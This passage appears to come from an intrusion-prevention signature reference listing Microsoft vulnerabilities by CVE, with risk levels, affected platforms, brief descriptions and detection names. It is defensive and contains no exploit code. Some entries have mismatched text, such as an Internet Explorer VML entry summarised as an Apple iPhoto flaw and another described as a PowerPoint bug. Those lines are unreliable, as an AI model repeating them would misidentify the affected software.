About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-1018
References:
CVE-2018-1018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1018
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-8275

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1084-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There has been reported a use-after-free vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Internet-Explorer-Use-After-Free-Vulnerability-CVE-2018-8275
References:
CVE-2018-8275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8275
ms18-jul
http://technet.microsoft.com/security/bulletin/ms18-jul
Back to top

Microsoft-Internet-Explorer-VBScript-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects by the VBScript engine. A remote attacker can exploit this vulnerability by enticing user to access a maliciously crafted website. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-VBScript-Memory-Corruption
References:
CVE-2014-0271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0271
BID-65395
http://www.securityfocus.com/bid/65395
OSVDB-103166
http://www.osvdb.org/103166
MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010
Back to top

Microsoft-Internet-Explorer-Vector-Markup-Language-Vgx-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows Vista; Windows 2003
Software: Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the Vector Markup Language (VML) implementation in Microsoft Windows. The vulnerability is caused due to an integer underflow in the VML implementation (vgx.dll) when receiving compressed HTTP response. Remote attackers can exploit this vulnerability by enticing the target user to visit a malicious webpage, to cause a heap-based buffer overflow and possibly inject and execute arbitrary code on the target system with the privileges of the currently logged in user. In an attack case where code injection is not successful, the affected application using the vulnerable vgx.dll will terminate abnormally. In a more sophisticated attack where code injection results is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: File-Binary_Microsoft-Internet-Explorer-Vector-Markup-Language-Vgx-Buffer-Overflow
References:
CVE-2007-1749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1749
BID-25310
http://www.securityfocus.com/bid/25310
MS07-050
http://technet.microsoft.com/security/bulletin/MS07-050
Back to top

Microsoft-Internet-Explorer-Virtual-Function-Table-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Internet Explorer (IE). The vulnerability is due to the way in which IE accesses a corrupted virtual function table. A remote attacker could exploit this vulnerability by enticing a target user to view a specially crafted webpage. A successful attack could result in the execution of arbitrary code in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Virtual-Function-Table-Memory-Corruption
References:
CVE-2011-2001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2001
BID-49966
http://www.securityfocus.com/bid/49966
OSVDB-76213
http://www.osvdb.org/76213
MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081
Back to top

Microsoft-Internet-Explorer-VML-Buffer-Overrun

About this vulnerability: A format string vulnerability in Apple iPhoto
Risk: High
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4; Windows XP; Windows XP 64-bit; Windows 2003; Windows 2003 64-bit
Software: Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0
Type: Buffer Overflow
Description: There is a buffer overrun vulnerability in Microsoft Internet Explorer. A crafted Vector Markup Language (VML) formatted file may be used to execute code in the privilege of the current user.
Situation: HTTP_Microsoft-Internet-Explorer-VML-Buffer-Overrun
File-Text_Microsoft-Internet-Explorer-VML-Buffer-Overrun
References:
CVE-2007-0024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0024
BID-21930
http://www.securityfocus.com/bid/21930
OSVDB-31250
http://www.osvdb.org/31250
MS07-004
http://technet.microsoft.com/security/bulletin/MS07-004
Back to top

Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft PowerPoint.
Situation: HTTP_SS-Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266
File-Text_Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266
References:
CVE-2011-1266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1266
MS11-052
http://technet.microsoft.com/security/bulletin/MS11-052
Back to top

Microsoft-Internet-Explorer-VML-Style-CVE-2012-0172

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 6.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-VML-Style-CVE-2012-0172
References:
CVE-2012-0172
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0172
MS12-023
http://technet.microsoft.com/security/bulletin/MS12-023
Back to top

Microsoft-Internet-Explorer-VML-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the access of previously deleted objects. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. If code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. In this case the injected code would be executed within the security context of the currently logged-in user. If code execution fails the vulnerable application may terminate abnormally.
Situation: File-Text_Microsoft-Internet-Explorer-VML-Use-After-Free
References:
CVE-2012-0155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0155
BID-51935
http://www.securityfocus.com/bid/51935
OSVDB-79268
http://www.osvdb.org/79268
MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010
Back to top

Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method

About this vulnerability: A buffer overflow vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-195-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 6.0
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Internet Explorer. There is no sufficient validation of parameters delivered to a specific ActiveX control. This leads to memory corruption. Remote attackers can exploit this vulnerability by persuading a target user to visit a specially-crafted web page. Successful exploitation causes memory corruption that may lead to arbitrary code execution in the security context of the logged in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method
File-Text_Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method
References:
CVE-2008-4258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4258
BID-32596
http://www.securityfocus.com/bid/32596
MS08-073
http://technet.microsoft.com/security/bulletin/MS08-073
Back to top

Microsoft-Internet-Explorer-XMLDOM-Information-Disclosure

About this vulnerability: A Microsoft Internet Explorer XMLDOM Information Disclosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer, versions 8.0 through 9.0, which allows remote attackers to enumerate remote machine's information, including local pathnames, intranet hostnames, intranet IP addresses, and other information.
Situation: File-Text_Microsoft-Xml-Core-Services-Vulnerable-ActiveX-Control
References:
CVE-2013-7331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7331
Back to top

Microsoft-Internet-Explorer-XSLT-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way in which Internet Explorer processes an iframe that points to an XSL document. This can result in access to an object that is not initialized or has already been deleted. A remote attacker could entice a target user to view a maliciously crafted web page that exploits this vulnerability to run arbitrary code in the target user's security context.
Situation: File-Text_Microsoft-Internet-Explorer-XSLT-Memory-Corruption
References:
CVE-2011-1963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1963
BID-49037
http://www.securityfocus.com/bid/49037
OSVDB-74499
http://www.osvdb.org/74499
MS11-057
http://technet.microsoft.com/security/bulletin/MS11-057
Back to top

Microsoft-Java-VM-Bytecode-Verifier-Bypass

About this vulnerability: A vulnerability in Microsoft Java VM
Risk: High
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows 98; Windows ME; Windows NT 4.0; Windows 2000; Windows XP
Software: <os>
Type: Malfunction
Description: There is a vulnerability in the Java ByteCode Verifier implementation in Microsoft's Java Virtual Machine. The vulnerability allows arbitary code execution in the context of the current user.
Situation: HTTP_Microsoft-Java-VM-Bytecode-Verifier-Bypass-JAR
File-Zip_Microsoft-Java-VM-Bytecode-Verifier-Bypass-JAR
References:
CVE-2003-0111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0111
MS03-011
http://technet.microsoft.com/security/bulletin/MS03-011
Back to top

Microsoft-Jet-Database-Engine-Excel-Component-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1012-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Improper handling of in-memory objects causes a buffer overflow vulnerability in Microsoft Jet Database Engine. A successful exploit allows arbitrary code to be executed on the target system.
Situation: File-OLE_Microsoft-Jet-Database-Engine-Excel-Component-Buffer-Overflow
References:
CVE-2017-8717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8717
Back to top

Microsoft-Jet-Database-Engine-Excel-Component-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A vulnerability in the Microsoft Jet Database engine.
Situation: File-OLE_Microsoft-Jet-Database-Engine-Excel-Component-Heap-Buffer-Overflow
References:
CVE-2017-8718
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8718
Back to top

Microsoft-Jet-Database-Engine-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability has been reported in the Microsoft JET Database Engine components. The vulnerability is due to improper handling of objects in memory. A remote, unauthenticated attacker can exploit the vulnerability by enticing a user to open a specially crafted Excel file while using an affected version of Microsoft Windows. Successful exploitation results in arbitrary code execution under the context of the user.
Situation: File-OLE_Microsoft-Jet-Database-Engine-Heap-Based-Buffer-Overflow
References:
CVE-2018-8392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8392
Back to top

Microsoft-Jet-Db-Engine-Buffer-Overflow

About this vulnerability: Vulnerability in Microsoft Jet database engine
Risk: High
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Jet Database Engine
Type: Buffer Overflow
Description: There is a vulnerability in Microsoft Jet database engine. Opening a crafted mdb file with an application that utilizes a vulnerable version of Jet engine, typically a Microsoft Access product, may lead to arbitrary code execution.
Situation: E-Mail_BS-Microsoft-Jet-Db-Engine-Buffer-Overflow
HTTP_Microsoft-Jet-Db-Engine-Buffer-Overflow
File-Binary_Microsoft-Jet-Db-Engine-Buffer-Overflow
References:
CVE-2005-0944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0944
BID-12960
http://www.securityfocus.com/bid/12960
OSVDB-15187
http://www.osvdb.org/15187
Back to top

Microsoft-JScript-Scripting-Engine-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-242-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4; Windows XP SP2; Windows XP 64-bit SP2; Windows 2003; Windows 2008; Windows Vista SP1
Software: <os>
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft Windows JScript Scripting Engine.
Situation: HTTP_SS-Microsoft-JScript-Scripting-Engine-Remote-Code-Execution
File-Text_Microsoft-JScript-Scripting-Engine-Remote-Code-Execution
References:
CVE-2009-1920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1920
MS09-045
http://technet.microsoft.com/security/bulletin/MS09-045
Back to top

Microsoft-Killbit-Disabled-ActiveX-Object

About this vulnerability: Disabled ActiveX object
Risk: High
First detected in: sgpkg-ips-248-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a multiple vulnerabilities in various ActiveX components. Microsoft disables these vulnerable objects within their patch releases.
Situation: HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
Back to top

Microsoft-Killbit-Disables-ActiveX-Object-CVE-2009-2493

About this vulnerability: ActiveX controls disabled with killbits
Risk: High
First detected in: sgpkg-ips-258-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There are multiple vulnerabilities in various ActiveX components. Microsoft disabled these vulnerable objects with a patch for MS09-055.
Situation: HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
References:
CVE-2009-2493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2493
MS09-055
http://technet.microsoft.com/security/bulletin/MS09-055
Back to top

Microsoft-Killbit-Disables-ActiveX-Object-CVE-2013-3918

About this vulnerability: ActiveX controls disabled with killbits
Risk: High
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2; Windows 8; Windows 2012
Software: <os>
Type: Malfunction
Description: There are multiple vulnerabilities in various ActiveX components. Microsoft disabled these vulnerable objects with a patch for MS13-090.
Situation: File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
References:
CVE-2013-3918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3918
BID-63631
http://www.securityfocus.com/bid/63631
OSVDB-99555
http://www.osvdb.org/99555
MS13-090
http://technet.microsoft.com/security/bulletin/MS13-090
Back to top

Microsoft-License-Logging-Server-RPC-Call-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A vulnerability has been reported in Microsoft License Logging Server. The vulnerability is due to a boundary error while handling RPC calls by the License Logging service. Remote attackers could exploit this vulnerability by sending a specially crafted RPC request to an affected system. Successful exploitation would result in execution of arbitrary code on the vulnerable system with SYSTEM privileges. The behaviour of the target is dependent on the intention of the malicious code. An unsuccessful exploit attempt may abnormally terminate the affected process.
Situation: MSRPC-TCP_CPS-Vulnerable-Microsoft-License-Logging-Server-Function-Called
References:
CVE-2009-2523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523
BID-36921
http://www.securityfocus.com/bid/36921
MS09-064
http://technet.microsoft.com/security/bulletin/MS09-064
Back to top

Microsoft-Lync-Information-Disclosure-CVE-2014-1923

About this vulnerability: A vulnerability in Microsoft Lync Server
Risk: High
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Lync Server 2010; Microsoft Lync Server 2013
Type: Input Validation
Description: There is a vulnerability in Microsoft Lync Server.
Situation: HTTP_CSU-Microsoft-Lync-Information-Disclosure-CVE-2014-1923
References:
CVE-2014-1923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1923
MS14-032
http://technet.microsoft.com/security/bulletin/MS14-032
Back to top

Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849

About this vulnerability: A vulnerability in Microsoft Lync
Risk: High
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Lync
Type: Malfunction
Description: There is a vulnerability in Microsoft Lync.
Situation: HTTP_SLS-Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849
SMB-TCP_CHS-Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849
References:
CVE-2012-1849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1849
OSVDB-82852
http://www.osvdb.org/82852
MS12-039
http://technet.microsoft.com/security/bulletin/MS12-039
Back to top

Microsoft-Malformed-AVI-Header-Vulnerability-MS09-038

About this vulnerability: A remote code execution vulnerability in AVI media handling
Risk: High
First detected in: sgpkg-ips-239-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A remote code execution vulnerability exists in the way Microsoft Windows handles AVI format files. A malicously formatted AVI file could trigger a vulnerability in Windows that allows remote code execution.
Situation: HTTP_SS-AVI-MS09-038
File-RIFF_Microsoft-Windows-AVI-MS09-038
File-RIFF_Microsoft-Windows-AVI-MS09-038-2
References:
CVE-2009-1545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1545
BID-35967
http://www.securityfocus.com/bid/35967
MS09-038
http://technet.microsoft.com/security/bulletin/MS09-038
Back to top

Microsoft-Malware-Protection-Engine-File-Processing-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Antigen for Exchange
Risk: High
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Antigen; Microsoft Forefront Client Security; Microsoft Forefront Security for Exchange Server; Microsoft Forefront Security for SharePoint; Microsoft Standalone System Sweeper; Microsoft Windows Defender; Microsoft Windows Live OneCare
Type: Input Validation
Description: There exists a vulnerability in Microsoft Malware Protection Engine, which can be exploited to cause denial of service. The vulnerability is due to insufficient validation of certain data values while parsing Portable Executable (PE) files compressed with PECompact. A remote attacker can exploit this vulnerability by sending a crafted PE file to the target, and potentially causing an access violation leading to a crash of the Malware Protection Engine. In a successful attack case, the affected service may terminate abnormally and cause a Denial of Service condition. In most products, the Microsoft Protection Engine service will restart automatically after a short delay (15 seconds in most cases).
Situation: SMTP_CS-Microsoft-Malware-Protection-Engine-File-Processing-Denial-Of-Service
References:
CVE-2008-1437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1437
BID-29060
http://www.securityfocus.com/bid/29060
MS08-029
http://technet.microsoft.com/security/bulletin/MS08-029
Back to top

Microsoft-Malware-Protection-Engine-Rar-Vmsf_RGB-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1066-5242
Last changed: sgpkg-ips-1731-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: Improper handling of Rar files causes a memory corruption vulnerability in Microsoft Exchange. A succesful exploit may allow code execution with system privileges.
Situation: File-Binary_Microsoft-Malware-Protection-Engine-Rar-Vmsf_RGB-Memory-Corruption
References:
CVE-2018-0986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0986
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Media-Center-CVE-2016-0185

About this vulnerability: A vulnerability in Microsoft Media Center
Risk: Moderate
First detected in: sgpkg-ips-762-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Media Center
Type: Input Validation
Description: A vulnerability in Microsoft Media Center
Situation: File-Text_Microsoft-Media-Center-CVE-2016-0185
References:
CVE-2016-0185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0185
MS16-059
http://technet.microsoft.com/security/bulletin/MS16-059
Back to top

Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879

About this vulnerability: Code execution vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-310-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008
Software: <os>
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Windows. By persuading a target user to open a malicious media file, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: E-Mail_BS-Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
HTTP_SS-Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
File-RIFF_Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
References:
CVE-2010-1879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1879
MS10-033
http://technet.microsoft.com/security/bulletin/MS10-033
Back to top

Microsoft-Media-Foundation-Cmp4metadatahandler-Addqtmetadata-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper handling of records in QuickTime files causes a use after free vulnerability in Windows Media Foundation. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-MPEG_Microsoft-Media-Foundation-Cmp4metadatahandler-Addqtmetadata-Use-After-Free
References:
CVE-2019-1430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1430
Back to top

Microsoft-Media-Foundation-Getkeyforindex-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper handling of QuickTime files causes an out of bounds read vulnerability in Windows Media Foundation. A successful exploit may result in the disclosure of data in system memory, which may help other attacks.
Situation: File-MPEG_Microsoft-Media-Foundation-Getkeyforindex-Out-Of-Bounds-Read
References:
CVE-2020-0939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0939
Back to top

Microsoft-Media-Player-Audio-Sampling-Rate-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows Media Player
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Media Player
Type: Malfunction
Description: There exists a memory corruption vulnerability in Windows Media Player 11. The vulnerability is due to insufficient memory allocation when playing audio files with different sampling rates within a single audio stream. An attacker may exploit this vulnerability by enticing a target user to open a malicious audio stream URL. Successful exploitation might lead to injection and execution of arbitrary code in the security context of the currently logged in user. In a attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. In an attack case where code injection is not successful, the vulnerable Windows Media Player application may terminate abnormally.
Situation: RTSP_SS-Microsoft-Media-Player-Audio-Sampling-Rate-Memory-Corruption
References:
CVE-2008-2253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2253
BID-30550
http://www.securityfocus.com/bid/30550
MS08-054
http://technet.microsoft.com/security/bulletin/MS08-054
Back to top

Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-30080

About this vulnerability: A vulnerability in Microsoft Message Queuing Service
Risk: High
First detected in: sgpkg-ips-1736-5242
Last changed: sgpkg-ips-1736-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A remote code execution vulnerability has been reported for the Message Queuing Service in Microsoft Windows.
Situation: HTTP_CSH-Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-30080
References:
CVE-2024-30080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30080
ms24-jun
http://technet.microsoft.com/security/bulletin/ms24-jun
Back to top

Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-49122

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1809-5242
Last changed: sgpkg-ips-1809-5242
Platform: Windows
Software: <os>
Type: Use-after-free
Description: Microsoft Message Queuing (MSMQ) remote code execution vulnerability CVE-2024-49122.
Situation: Generic_CS-Microsoft-Message-Queuing-Binary-Protocol-Usage
References:
CVE-2024-49122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49122
ms24-dec
http://technet.microsoft.com/security/bulletin/ms24-dec
Back to top

Microsoft-Message-Queuing-Remote-Code-Execution-Vulnerability-CVE-2023-21554

About this vulnerability: A vulnerability in Microsoft Message Queuing
Risk: High
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1582-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A remote code execution vulnerability has been reported for Message Queuing Service in Microsoft Windows. The vulnerability is due to improper handling of the incoming MSMQ packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted MSMQ packet to a MSMQ server. Successful exploitation of this vulnerability can result in execution of arbitrary code within the service.
Situation: Generic_CS-Microsoft-Message-Queuing-Remote-Code-Execution-Vulnerability-CVE-2023-21554
References:
CVE-2023-21554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21554
ms23-apr
http://technet.microsoft.com/security/bulletin/ms23-apr
Back to top

Microsoft-Message-Queuing-Service-Queue-Name-Handling-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Message Queuing Service
Risk: High
First detected in: sgpkg-ips-175-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4
Software: Microsoft Message Queuing
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Message Queuing Service included in Microsoft Windows 2000. The vulnerability is caused by a failure to validate messages containing user-defined memory addresses. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System-level privileges.
Situation: Generic_MSRPC-CPS-Microsoft-Message-Queuing-Service-Queue-Name-Handling-Bind
MSRPC-TCP_CPS-Microsoft-Message-Queuing-Service-Queue-Name-Handling
References:
CVE-2008-3479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3479
BID-31637
http://www.securityfocus.com/bid/31637
MS08-065
http://technet.microsoft.com/security/bulletin/MS08-065
Back to top

Microsoft-Mime-Formatted-Request-Vulnerability-CVE-2011-1894

About this vulnerability: An attempt to exploit vulnerability in Microsoft Windows detected
Risk: Moderate
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in the MHTML component allows an attacker to execute scripts in the user's context.
Situation: HTTP_SS-Mime-Formatted-Request-Vulnerability-CVE-2011-1894
File-Text_Mime-Formatted-Request-Vulnerability-CVE-2011-1894
References:
CVE-2011-1894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1894
BID-48205
http://www.securityfocus.com/bid/48205
MS11-037
http://technet.microsoft.com/security/bulletin/MS11-037
Back to top

Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-1386-5242
Last changed: sgpkg-ips-1389-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A remote code execution vulnerability has been reported in the Microsoft MSHTML Platform.
Situation: File-Text_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
File-RTF_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
File-TextId_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
References:
CVE-2021-40444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444
Back to top

Microsoft-MSHTML-Platform-CVE-2021-33742-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft ChakraCore
Risk: High
First detected in: sgpkg-ips-1372-5242
Last changed: sgpkg-ips-1372-5242
Platform: Windows
Software: ChakraCore; Microsoft Edge; Internet Explorer
Type: Malfunction
